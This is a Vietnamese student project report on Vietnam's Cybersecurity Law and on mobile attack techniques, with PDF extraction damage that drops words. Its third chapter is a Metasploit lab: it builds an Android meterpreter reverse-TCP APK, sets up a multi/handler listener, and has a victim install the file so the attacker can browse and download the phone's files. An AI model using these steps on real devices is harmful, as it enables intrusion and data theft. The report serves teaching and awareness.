Mục đích, ý nghĩa của Luật An ninh mạng...3 Trang 5 DANH MỤC HÌNHHình 1.1 Cấu trúc hệ điều hành Android...4Hình 1.2 Cấu trúc Windows Phone...6Hình 3.1 tạo file apk...7Hình 3.2 giao diện
BỘ GIÁO DỤC VÀ ĐÀO TẠO TRƯỜNG ĐẠI HỌC KINH TẾ - TÀI CHÍNH THÀNH PHỐ HỒ CHÍ MINH ĐỒ ÁN CHUYÊN NGÀNH Nghanh: Cong Nghe Thong Tin Chuyen nghanh: An toan thong tin ĐỀ TÀI TÌM HIỂU LUẬT AN NINH MẠNG VIỆT NAM VÀ KỸ THUẬT TẤN CÔNG TRÊN ĐIỆN THOẠI ANDROID Giảng viên hướng dẫn: TS Huỳnh Đệ Thủ Sinh viên thực hiện: Nguyễn Minh Tấn - 205051816 TP Hồ Chí Minh, năm 2024 BỘ GIÁO DỤC VÀ ĐÀO TẠO TRƯỜNG ĐẠI HỌC KINH TẾ - TÀI CHÍNH THÀNH PHỐ HỒ CHÍ MINH ĐỒ ÁN CHUYÊN NGÀNH Nghanh: Cong nghe thong tin Chuyen nghanh: An toan thong tin ĐỀ TÀI TÌM HIỂU LUẬT AN NINH MẠNG VIỆT NAM VÀ KỸ THUẬT TẤN CÔNG TRÊN ĐIỆN THOẠI ANDROID Giảng viên hướng dẫn: TS Huỳnh Đệ Thủ Sinh viên thực hiện: Nguyễn Minh Tấn - 205051816 TP Hồ Chí Minh, năm 2024 MỤC LỤC MỤC LỤC DANH MỤC HÌNH .1 Chương I: GIỚI THIỆU TỔNG QUAN VỀ AN NINH MẠNG .2 1.1 Giới thiệu An ninh mạng .2 1.2 Tình hình An ninh mạng Việt Nam .2 1.3 Tình hình An ninh mạng thiết bị di động 1.4 Luật An ninh mạng gì? Mục đích, ý nghĩa Luật An ninh mạng Chương II TÌM HIỂU MỘT SỐ KỸ THUẬT TẤN CÔNG THIẾT BỊ ĐIỆN THOẠI DI ĐỘNG .5 2.1 Hacking Android iOS .5 2.2 Hacking iOS 2.3 Hacking Windows Phone OS 2.4 Hacking BlackBerry .8 Chương III: MÔ PHỎNG KỸ THUẬT TẤN CÔNG NỀN TẢNG DI ĐỘNG ANDROID 3.1 Mô hacking Android OS .9 3.1.1 Chuẩn bị: 3.1.2 Thông tin ban đầu: 3.1.3 Các bước tiến hành: .9 3.2 Kết luận .13 Tài Liệu Tham Khảo 14 DANH MỤC HÌNH Hình 1.1 Cấu trúc hệ điều hành Android .4 Hình 1.2 Cấu trúc Windows Phone .6 Hình 3.1 tạo file apk Hình 3.2 giao diện Metasploit .8 Hình 3.3 sử dụng khai thác đa xử lý cấu hình chuyển đổi tải trọng Metasploit Hình 3.5 Giao diện máy ảo chạy hệ điều hành android kích hoạt file apk 10 Hình 3.6 Máy cơng nhận kết nối từ máy nạn nhân 10 Hình 3.7 Danh sách thư mục máy điện thoại Android 11 Hình 3.8 Thực download file apk thư mục download máy Android 11 PAGE \* MERGEFORMAT Chương I: GIỚI THIỆU TỔNG QUAN VỀ AN NINH MẠNG 1.1 Giới thiệu An ninh mạng An ninh mạng “là bảo đảm hoạt động không gian mạng không gây phương hại đến an ninh quốc gia, trật tự, an tồn xã hội, quyền lợi ích hợp pháp quan, tổ chức, cá nhân” An ninh mạng lĩnh vực có nhiệm vụ bảo vệ thông tin cá nhân hoạt động liên quan đến máy tính cách phát hiện, ngăn chặn ứng phó với cơng từ bên ngồi; bảo vệ hệ thống mạng khơng bị phá hoại phần cứng hay chỉnh sửa liệu; cung cấp giải pháp, sách bảo vệ máy tính, hệ thống mạng nhằm ngăn cản người dùng trái phép hay mã độc hại xâm nhập vào Các yếu tố cần bảo vệ: - Dữ liệu - Tài nguyên hệ thống - Danh tiếng liệu bị đánh cắp 1.2 Tình hình An ninh mạng Việt Nam Tình hình an tồn, an ninh mạng Việt Nam tiếp tục diễn biến phức tạp, tồn nhiều sở gây nguy bị công, phá hoại hạ tầng mạng thông tin, ảnh hưởng tới an ninh quốc gia. Ghi nhận năm 2022 có 11.213 cơng mạng gây cố vào hệ thống thông tin Trong số có 3.900 cơng Phishing (Tấn công giả mạo), 1.500 công Deface gần 5.800 công lây nhiễm mã độc malware Số công mạng tăng 44,2% so với kỳ năm 2021 Theo tổng hợp Công ty Công nghệ An ninh mạng quốc Gia Việt Nam (NCS), năm 2023 ghi nhận 13.900 vụ tấn cơng mạng vào tổ chức Việt Nam, trung bình tháng xảy 1.160 vụ, tăng 9,5% so với năm 2022 Các mục tiêu chịu nhiều công năm qua quan phủ, hệ thống ngân hàng, tổ chức tài chính, hệ thống công nghiệp hệ thống trọng yếu khác Các công chủ yếu đến từ: - Tin nhắn rác - Wifi miễn phí Việt Nam - Làm máy tính nhiễm virus từ USB - Các ứng dụng giã mạo di động - Mã độc PAGE \* MERGEFORMAT - DDoS 1.3 Tình hình An ninh mạng thiết bị di động Trong năm gần đây, phổ biến thiết bị di động điện thoại thơng minh máy tính bảng mang lại cho người dùng nhiều tiện ích khả dễ dàng sử dụng kết nối Internet lúc, nơi Theo số liệu Liên minh Viễn thông Quốc tế (ITU) đưa thông cáo báo chí “Sự kiện số liệu 2022” cho thấy, tính đến cuối năm 2022, gần 3/4 dân số tồn cầu từ 10 tuổi trở lên (ước khoảng 73% dân số) sở hữu điện thoại di động Tuy nhiên, việc sử dụng nhiều thiết bị di động làm gia tăng công mạng, liên kết yếu sở hạ tầng công nghệ thông tin hầu hết tổ chức, doanh nghiệp Việc nhận thức rõ mối đe dọa an toàn thiết bị di động giúp người dùng cá nhân tổ chức tìm biện pháp đảm bảo an ninh an tồn mơi trường di động Theo chuyên gia bảo mật, vi phạm an toàn thiết bị di động gia tăng thời gian tới, tiếp tục khiến cho nguy an tồn thơng tin từ thiết bị di động trở nên nguy hiểm Vì góc độ người dùng, tổ chức, doanh nghiệp cần phải nhận diện mối đe dọa thiết bị di động để tận dụng lợi ích từ thiết bị di động đảm bảo vấn đề an tồn cho hoạt động Cụ thể, mối đe dọa thiết bị di động chia thành nhiều loại mối đe dọa từ vật lý, mạng, hệ thống ứng dụng 1.4 Luật An ninh mạng gì? Mục đích, ý nghĩa Luật An ninh mạng Luật An ninh mạng gồm chương, 43 điều, quy định nội bảo vệ an ninh mạng hệ thống thông tin quan trọng an ninh quốc gia; phòng ngừa, xử lý hành vi xâm phạm an ninh mạng; triển khai hoạt động bảo vệ an ninh mạng quy định trách nhiệm quan, tổ chức, cá nhân Những điều bị cấm Luật An ninh mạng Theo quy định Luật An ninh mạng, có nhiều hành vi bị cấm khơng gian mạng, bao gồm: - Đăng tải, phát tán thông tin khơng gian mạng có nội dung tun truyền chống Nhà nước Cộng hòa xã hội chủ nghĩa Việt Nam - Kích động gây bạo loạn, phá rối an ninh, gây rối trật tự công cộng - Đăng tải thông tin có nội dung làm nhục, vu khống người khác - Đăng tải thơng tin có nội dung xâm phạm trật tự quản lý kinh tế - Chiếm đoạt tài sản - Tổ chức đánh bạc, đánh bạc qua mạng internet,… Nếu cá nhân, tổ chức sản xuất, đưa vào sử dụng công cụ, phương tiện, phần mềm có hành vi cản trở, gây rối loạn hoạt động mạng máy tính, mạng viễn PAGE \* MERGEFORMAT thơng; phát tán chương trình tin học gây hại cho hoạt động mạng máy tính, mạng viễn thơng, phương tiện điện tử; xâm nhập trái phép vào mạng máy tính, mạng viễn thơng phương tiện điện tử người khác, bị xử lý Mục đích Luật An ninh mạng: - Hoàn thiện sở pháp lý ổn định an ninh mạng theo hướng áp dụng quy định pháp luật cách đồng bộ, khả thi thực tiễn thi hành - Phát huy nguồn lực đất nước để bảo đảm an ninh mạng, phát triển lĩnh vực an ninh mạng đáp ứng yêu cầu phát triển kinh tế – xã hội, quốc phịng, an ninh, góp phần nâng cao chất lượng sống nhân dân bảo đảm quốc phịng, an ninh - Bảo vệ chủ quyền, lợi ích, an ninh quốc gia, quyền lợi ích hợp pháp tổ chức, cá nhân tham gia hoạt động không gian mạng, xây dựng môi trường không gian mạng lành mạnh - Nâng cao lực tự chủ an ninh mạng, hồn thiện sách nghiên cứu, phát triển chiến lược, chia sẻ thông tin an ninh mạng - Mở rộng hợp tác quốc tế an ninh mạng sở tôn trọng độc lập, chủ quyền, bình đẳng, có lợi, phù hợp với pháp luật nước điều ước quốc tế mà nước ta tham gia ký kết Ý nghĩa Luật An ninh mạng: - Hệ thống thông tin quan, tổ chức, cá nhân bảo vệ trước hoạt động công mạng theo quy định Luật An ninh mạng - Các hệ thống thông tin quan trọng an ninh quốc gia bảo vệ tương xứng với tầm quan trọng an ninh quốc gia, trật tự an toàn xã hội - Quyền lợi ích hợp pháp tổ chức, cá nhân bảo vệ trước hành vi công mạng - Luật An ninh mạng quy định cụ thể chế phối hợp phịng, chống cơng mạng bộ, ngành chức năng, xác định trách nhiệm cụ thể Bộ Cơng an, Bộ Quốc phịng, Ban Cơ yếu Chính phủ phịng, chống cơng mạng PAGE \* MERGEFORMAT Chương II TÌM HIỂU MỘT SỐ KỸ THUẬT TẤN CÔNG THIẾT BỊ ĐIỆN THOẠI DI ĐỘNG 2.1 Hacking Android iOS Android đống phần mềm phát triển Google riêng cho thiết bị di động điện thoại thơng minh máy tính bảng Nó bao gồm hệ thống điều hành, middleware ứng dụng quan trọng hệ điều hành di động Android dựa nhân Linux Các ứng dụng Android chạy sandbox Các tính hệ điều hành Android bao gồm: - - Khung ứng dụng cho phép tái sử dụng thay linh kiện Máy ảo Dalvik tối ưu hóa cho thiết bị di động Tích hợp trình duyệt dựa công cụ WebKit mã nguồn mở SQLite để lưu trữ liệu © Truyền thơng hỗ trợ cấu trúc cho âm phổ biến, video, định dạng hình ảnh (MPEG4, H.264, MP3, AAC, AMR, JPG, PNG, GIF) Môi trường phát triển phong phú bao gồm trình giả lập thiết bị, cơng cụ để gỡ lỗi, nhớ hiệu suất profiling, plugin cho Eclipse IDE Cấu trúc hệ điều hành Android: PAGE \* MERGEFORMAT Hình 1.1 Cấu trúc hệ điều hành Android PAGE \* MERGEFORMAT Một số kĩ thuật công Thiết bị di động Android: 2.2 Hacking iOS Kĩ thuật công Thiết bị di động iOS: Jailbreaking phương pháp việc kiểm soát hệ điều hành iOS sử dụng thiết bị Apple Nó làm giãn thiết bị từ rào cản phụ thuộc vào ứng dụng mã nguồn độc quyền Apple cho phép người dùng sử dụng ứng dụng bên thứ ba sẵn cửa hàng ứng dụng thức Nó thực cách cài đặt sửa đổi vá lỗi kernel cho phép bạn chạy ứng dụng bên thứ ba chữ ký nhà cung cấp hệ điều hành Nó sử dụng để thêm nhiều chức cho tiện ích Apple chuẩn Nó cung cấp quyền truy cập root vào hệ thống điều hành cho phép tải ứng dụng bên thứ ba, chủ đề, phần mở rộng, vv Điều loại bỏ hạn chế sandbox, cho phép ứng dụng độc hại để truy cập tài nguyên di động hạn chế thông tin Khi Jailbreak hình thành rủi ro khác cho thiết bị bạn bao gồm: - Bãi bỏ bảo hành điện thoại bạn Hiệu suất Bricking thiết bị Nhiễm phần mềm độc hại 2.3 Hacking Windows Phone OS Windows Phone hệ điều hành hệ thứ hai phát triển Microsoft cho Windows Phone Đặc điểm quan trọng Windows Phone 8: - - - Nó cho phép thiết bị có hình lớn vi xử lý đa lõi lên tới 64 lõi Thành phần cốt lõi Windows 8, bao gồm hạt nhân, hệ thống tập tin, trình điều khiển, mạng stack, thành phần an ninh, phương tiện truyền thông hỗ trợ đồ họa Internet Explorer 10, công nghệ đồ Nokia, đa nhiệm Hỗ trợ mã nguồn gốc (C C ++), đơn giản hóa porting từ tảng Android, Symbian, iOS Nhà cung cấp kiểm soát xây dựng thương hiệu nguyên tố "ví tiền" thơng qua SIM phần cứng điện thoại Unified Extensible Firmware Interface (UEFI) giao thức khởi động an tồn Firmware qua mạng khơng cho cập nhật Windows Phone Cải thiện hỗ trợ cho lưu trữ di động chia tin cậy PAGE \* MERGEFORMAT Hình 1.2 Cấu trúc Windows Phone 2.4 Hacking BlackBerry BlackBerry OS hệ điều hành điện thoại di động độc quyền phát triển Research In Motion (RIM) cho dịng BlackBerry điện thoại thơng minh thiết bị cầm tay Để công hệ điều hành BlackBerry khai thác Dịch Vụ Tin Nhắn Ngắn - Short Message Service (SMS) Một số kỹ thuật như: - SMS Backdoor Khai thác Email Phần mềm gián điệp FinSpy Mobile PAGE \* MERGEFORMAT Chương III: MÔ PHỎNG KỸ THUẬT TẤN CÔNG NỀN TẢNG DI ĐỘNG ANDROID 3.1 Mô hacking Android OS 3.1.1 Chuẩn bị: + máy ảo cài hệ điều hành kali linux + máy cài android 3.1.2 Thông tin ban đầu: + Địa IP máy công + Cổng nhận kết nối 3.1.3 Các bước tiến hành: Bước 1: cửa sổ terminal máy ảo kali linux tạo file files.apk Bằng lệnh “msfpayload android/merterpreter/reverse_tcp lhost = lport R > < tên file apk>” (sử dụng khung tải trọng Metasploit để khai thác) Hình 3.1 tạo file apk Bước 2: Gõ msfconsole đến đến giao diện điều khiển Metasploit PAGE \* MERGEFORMAT Hình 3.2 giao diện Metasploit Bước 3: Vì tải trọng ban đầu reverse_tcp nơi kẻ công mong đợi nạn nhân để kết nối với máy công,máy công phải thiết lập xử lý để xử lý kết nối vào cổng quy định Gõ lệnh : Use exploit/multi/handler ( sử dụng xử lý Metasploit , khai thác đa xử lý) Set payload android/meterpreter/reverse_tcp ( Đảm bảo tải trọng trùng với bước ) Bước 4: Cấu hình chuyển đổi cho tải trọng Metasploit , xác định bước Gõ lệnh: Set lhost (Địa IP máy công) Set lport (Cổng lắng nghe kết nối đảo ngược) Exploit (Bắt đầu lắng nghe kết nối) PAGE \* MERGEFORMAT Hình 3.3 sử dụng khai thác đa xử lý cấu hình chuyển đổi tải trọng Metasploit Bước 5: Chia file với đuôi apk vừa tạo lên internet máy nạn nhân tải cài vào máy PAGE \* MERGEFORMAT Hình 3.5 Giao diện máy ảo chạy hệ điều hành android kích hoạt file apk Hình 3.6 Máy công nhận kết nối từ máy nạn nhân Tới máy công bên nạn nhân điện thoại android , làm thứ với điện thoại nạn nhân PAGE \* MERGEFORMAT Hình 3.7 Danh sách thư mục máy điện thoại Android Hình 3.8 Thực download file apk thư mục download máy Android 3.2 Kết luận Một là, phát triển mạng xã hội góp phần quan trọng pháttriển kinh tế – xã hội, song tạo môi trường thuận lợi cho hoạt động tác động, chuyển hóa trị, khủng bố Hai là, phát triển trí tuệ nhân tạo tạo thành tựu khoa học công nghệ vượt trội, đóng vai trị ngày quan trọng nhiều lĩnh vực đời sống xã hội dự báo gây nên “thảm họa” không kiểm soát chặt chẽ Ba là, thiết bị kết nối internet ngày phổ biến không mang lại lợi ích to lớn cho sống người, phát triển kinh tế – xã hội, bảo đảm quốc phòng – an ninh mà cịn bị sử dụng để tiến hành công mạng quy mô lớn Bốn là, cơng mạng có chủ đích (Advanced Peristent Threat – APT) khơng phá hoại mục tiêu, cơng trình quan trọng an ninh quốc gia mà cịn chiếm đoạt thơng tin, tài liệu bí mật, chiếm đoạt để sử dụng hệ thống liệu lớn, liệu nhanh phục vụ ý trị hoạt động phạm tội Thực trạng, nguy đặt yêu cầu thiết phải xây dựng ban hành văn luật an ninh mạng để phòng ngừa, đấu tranh, xử lý hành vi sử dụng không gian mạng xâm phạm an ninh quốc gia, trật tự an toàn xã hội, quyền lợi ích hợp pháp tổ chức, cá nhân Không nên cài đặt file Apk từ nguồn không rõ PAGE \* MERGEFORMAT Nếu thật muốn cài file Apk từ nguồn khơng rõ phải xem kiểm tra mã nguồn (Mã nguồn tham khảo Hacking - tutorial com) Tài Liệu Tham Khảo [1] Bộ CEHv8 Module 16 Hacking Mobile Platforms, Module 16- Hacking Mobile Platforms [2] http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphonetutorial-using-metasploit/#sthash.PXFG0pvc.h68PJa1W.dpbs [3]https://apsachieveonline.org/cach-chay-thu-nghiem-tham-nhap-tren-may-anh-dienthoai-android-voi-kali-linux/ [4]https://baonghean.vn/10-xu-huong-an-ninh-mang-hang-dau-trong-nam-2023post268453.html [5]https://baothaibinh.com.vn/tin-tuc/189383/13-900-vu-tan-cong-an-ninh-mangnham-vao-cac-he-thong-tai-viet-nam-trong-nam-2023 [6]https://2atlantic.edu.vn/khai-niem-an-ninh-mang-theo-luat-an-ninh-mang-moinhat/ PAGE \* MERGEFORMAT